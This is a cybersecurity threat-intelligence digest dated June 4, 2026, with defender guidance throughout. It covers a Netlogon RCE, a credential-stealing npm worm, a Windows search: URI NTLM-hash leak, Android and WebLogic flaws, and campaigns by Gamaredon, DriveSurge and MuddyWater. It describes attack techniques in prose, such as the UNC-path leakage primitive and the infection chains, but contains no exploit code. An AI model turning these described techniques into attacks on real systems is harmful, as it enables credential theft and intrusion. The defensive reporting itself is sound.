Thursday, June 4, 2026 - Border Cyber Group
Windows Netlogon RCE (CVE-2026-41089, CVSS 9.8)
Sources: Belgium Centre for Cybersecurity (CCB) advisory; BleepingComputer; Orca Security; RedPacket Security
A stack-based buffer overflow in the Windows Netlogon service is confirmed under active exploitation. An unauthenticated attacker with network access to a domain controller can send a crafted Netlogon RPC request and achieve SYSTEM-level code execution. All currently supported Windows Server releases — Server 2012 through Server 2025 — are affected. Microsoft patched the flaw during May Patch Tuesday on May 12, as part of a release addressing more than 130 vulnerabilities. Microsoft's initial advisory rated it as "less likely" to be exploited; the Belgian CCB updated its advisory on May 29 with active-exploitation confirmation sourced from "trusted partners." Microsoft has not independently corroborated those claims, but recommends applying the patch immediately.
A public proof-of-concept has been published. As of this writing it is crash-oriented — it demonstrates the buffer overflow condition by sending a malformed CLDAP request and verifying whether the DC stops responding — but does not include shellcode or command execution. That narrows the gap from crash-primitive to working exploit, and threat actors can and do extend published PoC code.
Why it matters: The history of Netlogon vulnerabilities — including ZeroLogon (CVE-2020-1472) — demonstrates that domain-controller flaws frequently attract rapid exploit development and ransomware operator interest once technical details are public. The blast radius of a successful exploit is an entire Active Directory domain.
Defender action: Apply the May 2026 cumulative update to all domain controllers immediately, and do so across the entire environment in a single window — partial patching leaves remaining DCs exposed. Restrict Netlogon traffic to authenticated internal sources; isolate domain controllers from internet exposure. Do not wait for the June 9 Patch Tuesday window.
CCB advisory / BleepingComputer / Orca Security blog
Miasma Worm Backdoors 32 Red Hat npm Packages
Sources: Wiz Research (primary); Aikido Security; OX Security — all June 1, 2026
On June 1, a credential-stealing worm was injected into 96 versions across 32 packages under the @redhat-cloud-services npm namespace — packages with a combined download volume of roughly 117,000 per week. The entry point was a compromised Red Hat employee GitHub account: threat intelligence firm Whiteintel found the relevant credential and session cookie in infostealer logs dated April 13 and May 15. The attacker leveraged GitHub Actions OIDC tokens, meaning the CI/CD pipeline itself was the delivery mechanism rather than an individually stolen npm token. The malicious preinstall script runs automatically on npm install and harvests GitHub tokens, npm tokens, AWS/GCP/Azure credentials, SSH keys, and local environment variables, exfiltrating them to an attacker-controlled GitHub repository over encrypted channels.
Attribution: The payload is a variant of Mini Shai-Hulud, a credential-stealing worm whose source code was publicly released by threat actor TeamPCP (also tracked as Replicating Marauder / UNC6780) on May 12, 2026, and has since become available to other actors. Because the tooling is now open-source, direct attribution to TeamPCP is assessed at medium confidence only. As of June 4, Wiz Research has confirmed a second wave of affected packages — same core payload, now using binding.gyp for installation-time execution.
Defender action: Audit CI/CD pipelines for unexpected workflow modifications over the past two weeks. Rotate any credentials present in environments that installed affected versions. The full impacted package list is in the Wiz Research primary advisory.
Wiz Research primary / Aikido Security / OX Security
Windows Search URI Handler Leaks NTLMv2 Hashes — No CVE Assigned
Source: Huntress (Andrew Schwartz) — disclosed June 3, 2026
Huntress disclosed an unpatched variant of the same NTLM credential-leakage primitive that Microsoft fixed in April for the Windows Snipping Tool (CVE-2026-33829). The search: URI handler accepts a crumb=location: parameter that, when pointed at a UNC path, triggers outbound SMB authentication before Windows renders any error — leaking the user's Net-NTLMv2 hash to an attacker-controlled server with a single link click. No malware, no payload, no complex exploit chain required.
The policy problem: Microsoft confirmed the same Moderate / CVSS 4.3 rating as the Snipping Tool bug but declined to patch or assign a CVE, stating the issue falls below its servicing bar. The search-ms: / crumb=location: UNC leakage primitive was documented by Varonis in February 2024 and closed without a patch then too. This class of vulnerability has a consistent track record of Microsoft declining to service it, and organizations relying on CVE coverage as their patch signal have zero visibility into it.
Defender action: Block outbound SMB (TCP 445 and 139) from endpoints that do not require it. Enforce SMB signing. Where feasible, set RestrictSendingNTLMTraffic to 2 after internal auditing. Alert on search: URI handler invocations from browser processes.
Huntress primary research
Android Framework Zero-Day (CVE-2025-48595) Under Limited Targeted Exploitation
Google Android Security Bulletin June 2026; CISA KEV entry June 2, 2026; BleepingComputer
Google's June 2026 Android security update addresses 124 vulnerabilities, including one confirmed zero-day: CVE-2025-48595, an integer overflow in multiple locations within the Android Framework that enables local privilege escalation without any user interaction. Affected versions: Android 14, 15, 16, and 16 QPR2. Google's phrasing — "limited, targeted exploitation" — is the same language the company typically uses for commercial spyware or nation-state operations against specific high-value individuals, though no actor has been publicly attributed.
Technical note: The attack vector is local, meaning likely delivery paths include a malicious or trojanized application, or chaining with a separate initial-access vulnerability. CISA added CVE-2025-48595 to the KEV catalog on June 2 with a June 5 remediation deadline for federal agencies. This is the fourth Android zero-day confirmed as exploited since December 2025.
Defender action: Enterprise Android fleets managed via MDM/EMM should force the June patch cycle. Pixel devices receive updates immediately; OEM timelines vary.
Google Android Security Bulletin / BleepingComputer
Oracle WebLogic CVE-2024-21182: A 2024-Era Bug Still Getting Popped
Sources: CISA KEV entry June 1, 2026; The Hacker News; thecybersignal.com
CISA added CVE-2024-21182 to the Known Exploited Vulnerabilities catalog on June 1, with a June 4 federal remediation deadline — today. The vulnerability is in Oracle WebLogic's Core component and allows unauthenticated network-level access via the T3 and IIOP protocols, the same protocol surface behind multiple previous critical WebLogic exploitations. Oracle patched it in the July 2024 Critical Patch Update. Active exploitation confirmed nearly two years after that patch indicates a persistent population of unpatched, internet-exposed WebLogic deployments.
Caution on classification: Despite RCE framing in some coverage, CISA's official description characterizes the impact as unauthorized access to WebLogic-accessible data, not confirmed remote code execution. CVSS is 7.5. No threat actor has been publicly attributed to current exploitation.
Defender action: Apply the Oracle July 2024 CPU or any subsequent CPU that includes the fix. If WebLogic's T3 and IIOP protocols are internet-accessible, restrict them to internal network segments immediately.
CISA KEV catalog / The Hacker News
Gamaredon Chains WinRAR CVE Into a Full Modular Malware Suite Against Ukraine
Sources: Sekoia threat research (primary, January 2026 infection chain); Google Threat Intelligence Group (CVE multi-actor attribution, January 2026)
Sekoia published analysis of a Gamaredon campaign against Ukrainian organizations using CVE-2025-8088, a path traversal flaw in WinRAR versions prior to 7.13. The same CVE has been tied by Google Threat Intelligence Group to independent exploitation by Sandworm (APT44/FROZENBARENTS), Turla (SUMMIT), and a China-nexus actor — each deploying different payloads against largely overlapping Ukrainian targets. The multi-actor adoption of a single exploit is worth flagging: GTIG documented all four clusters using the same vulnerability in separate campaigns observed through January 2026.
The Gamaredon-specific infection chain: weaponized xHTML lure → CVE-2025-8088 exploits WinRAR to write a hidden HTA into the Windows Startup directory → GammaPhish (mshta.exe execution with a decoy PDF) → GammaLoad (VBScript fingerprinting and downloader) → GammaWorm and/or GammaSteel depending on operator objective.
Technical highlights:
- GammaWorm — Sekoia describes this as a VBScript worm of more than 20,000 lines of obfuscated code. It abuses NTFS Alternate Data Streams to hide its modules from casual filesystem inspection and resolves C2 infrastructure through Telegram, Telegra.ph, Teletype.in, and Cloudflare Workers as dead-drop resolvers, storing live server addresses in registry keys under
HKCU\Console\. - GammaSteel — A modular information stealer that exfiltrates files matching targeted extensions to an AWS S3 bucket, with an attacker-controlled server as fallback. The campaign has shifted largely to fileless VBScript execution — a deliberate stealth improvement over earlier Gamaredon tooling.
Defender action: Update WinRAR to 7.13 or later. Monitor the Windows Startup folder for new HTA, LNK, or script files created via RAR extraction. Alert on mshta.exe network connections and outbound Netlogon/SMB from non-DC workstations.
Sekoia blog (primary) / Google Threat Intelligence Group
Note: Pull Sekoia's full technical write-up for the complete IOC set before publishing. The GTIG CVE-2025-8088 multi-actor report is publicly available on Google Cloud Blog.
DriveSurge: Industrialized ClickFix and FakeUpdates IAB Operation
Sources: SilentPush research report (primary); BleepingComputer — June 1–2, 2026
SilentPush documented DriveSurge, an initial access broker that has operated since at least September 2025 and evaded detection for nearly a year. Its model: compromise legitimate high-reputation websites, inject lightweight JavaScript beacon scripts, then route qualified visitors through an open-source traffic distribution system (zTDS) to either ClickFix or FakeUpdates lure pages. The TDS actively profiles visitors — bots and researchers receive the clean legitimate page; profiled targets get the social engineering overlay.
The ClickFix variant delivers a fake error message paired with a PowerShell command that installs malware directly. FakeUpdates impersonates browser update prompts for Chrome, Firefox, Edge, Safari, and eight other browsers. DriveSurge operates as a pay-per-install intermediary, selling verified initial access to downstream operators — making it a precursor supplier for ransomware and espionage campaigns. Infrastructure was traced through NiceNIC-registered bulletproof hosting domains. Both Windows and macOS systems are targeted; macOS ClickFix attacks use clipboard hijacking.
SilentPush primary report / BleepingComputer
Citrix NetScaler CVE-2026-3055: Large-Scale Exploitation Confirmed
Sources: Rapid7 ETR (primary technical analysis); watchTowr; Fortinet threat intelligence; Cybersecurity Dive — March–June 2026
CVE-2026-3055 is a SAML IDP-specific out-of-bounds memory read in NetScaler ADC and Gateway (CVSS 9.3, patched March 23). Fortinet's threat intelligence team has confirmed large-scale exploitation in the wild against internet-facing NetScaler appliances configured as SAML Identity Providers. watchTowr's technical analysis identified that the flaw involves an unvalidated wctx parameter in SAML-related HTTP requests; when present without an associated value, the appliance accesses uninitialized memory and leaks it across the response. CISA added the CVE to its KEV catalog in late March.
This item is carried forward because Fortinet's large-scale confirmation is recent and many organizations remain unpatched. The exploitation pattern follows a trajectory reminiscent of the earlier CitrixBleed cycle — reconnaissance, targeted exploitation, and rapid broadening once reliable techniques circulated.
Defender action: Apply the March 23 patch (NetScaler ADC/Gateway 14.1-66.59 or later; 13.1-62.23 or later). Check whether appliances are configured as SAML Identity Providers and prioritize those. If patching is not immediately possible, restrict external access to SAML IDP endpoints at the network layer.
Rapid7 ETR / watchTowr technical analysis / Cybersecurity Dive
MuddyWater Uses Microsoft Teams Screen-Sharing for Credential Harvesting
Source: Rapid7 incident response report — intrusion observed early 2026
Rapid7 documented an intrusion attributed with high confidence to MuddyWater — an Iranian state-sponsored cluster linked to MOIS — that initially appeared to be a Chaos ransomware incident. Rapid7's assessment is that the operational objectives were espionage and credential access, not disruption; no file-encrypting payload was deployed. The ransomware framing appears to be a deliberate attribution-confusion technique.
Initial access was social engineering via Microsoft Teams: the threat actors engaged victim employees directly, established screen-sharing sessions, and used live access to steal credentials, manipulate MFA configurations, and compromise accounts. In at least one instance, AnyDesk was deployed for persistent remote management access. The attackers accessed VPN configuration files directly and instructed employees to type credentials into locally created text files during the session.
Pattern to flag: Teams-based social engineering has appeared repeatedly across MuddyWater and related Iranian clusters through 2024–2026. The TTPs here — screen-sharing, MFA manipulation, AnyDesk deployment — require no exploits and leave limited forensic artifacts compared to malware-based intrusions.
Rapid7 incident response report
Follow-up: Pull Rapid7's full write-up for complete MITRE ATT&CK mapping and IOCs. #followup
Active exploitation dashboard — June 4, 2026
| CVE | Product | CVSS | KEV status | Action |
|---|---|---|---|---|
| CVE-2026-41089 | Windows Netlogon Domain controllers, all supported Server releases | 9.8 | Not yet listed | Patch immediately |
| CVE-2025-48595 | Android Framework Android 14, 15, 16, 16 QPR2 | 8.4 | Added June 2 — due June 5 | Force MDM update |
| CVE-2024-21182 | Oracle WebLogic T3 / IIOP protocol surface | 7.5 | Added June 1 — due today | Apply Oracle July 2024 CPU |
| CVE-2026-3055 | Citrix NetScaler SAML IDP configurations only | 9.3 | Added March 2026 | Patch NetScaler 13.1 / 14.1 |
| No CVE assigned | Windows search: URI handler NTLM hash leakage, one-click | ~4.3 | No patch — declined by Microsoft | Block outbound SMB; enforce signing |
Sources checked: CISA KEV catalog, BleepingComputer, The Hacker News, CCB Belgium, Huntress, Wiz Research, Aikido Security, SilentPush, Sekoia, Google Threat Intelligence Group, SecurityWeek, Rapid7, SC Media, Orca Security, watchTowr, RedPacket Security. All items corroborated across at least two independent sources except where noted as single-source.
Jonathan Brown is a cybersecurity researcher and investigative journalist at bordercybergroup.com.
If you would like to support our work — useful, well-researched, ad-free cybersecurity intelligence — buy us a coffee: https://bordercybergroup.com/#/portal/support
Member discussion: